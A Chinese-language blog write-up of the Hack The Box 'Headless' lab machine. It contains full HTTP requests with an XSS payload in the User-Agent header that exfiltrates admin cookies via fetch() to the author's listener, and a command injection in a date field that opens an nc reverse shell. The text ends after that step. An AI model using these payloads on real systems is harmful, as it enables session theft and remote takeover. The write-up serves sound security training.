htb headless复盘 | Flowww's blog

刚开始接触htb，感觉很有收获，记录一下

靶机信息

地址：https://app.hackthebox.com/machines/Headless

难度：easy

IP：10.10.11.8

信息搜集

扫到22端口和5000端口，5000端口是upnp服务，要用http协议访问

能看到一个表单，思路是ssti，sql注入，xss，先尝试ssti

被拦截了，而且信息还说会把相关信息发给管理员，思路来了，这地方就可以考虑xss

构造一个恶意xss数据包，同时还要在本地用python开启一个http服务看返回的数据

1	python3 -m http.server 5666

发包

POST /support HTTP/1.1
Host: 10.10.11.8:5000
Content-Length: 59
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.11.8:5000
Content-Type: application/x-www-form-urlencoded
User-Agent: <img src=15m0 onerror=fetch("http://10.10.16.19:5666/?cookie="+document.cookie);>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.11.8:5000/support
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

fname=1&lname=1&email=1@1.com&phone=1&message=1%0a{{1*1}}

User-Agent: <img src=15m0 onerror=fetch(“http://10.10.16.19:5666/?cookie="+document.cookie);> 重点是这个

然后等待一下，就弹回了cookie

同时dirsearch扫出来dashboard目录

拿到了cookie在访问dashboard就不会401了

Userflag

抓包发现有post发送了了一个date数据，这里的思路是命令注入，有点难想到吧

在date后面加；然后写入命令反弹shell

POST /dashboard HTTP/1.1
Host: 10.10.11.8:5000
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://10.10.11.8:5000
Connection: close
Referer: http://10.10.11.8:5000/dashboard
Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
Upgrade-Insecure-Requests: 1

date=2023-09-15;nc -e /bin/bash 10.10.16.19 1234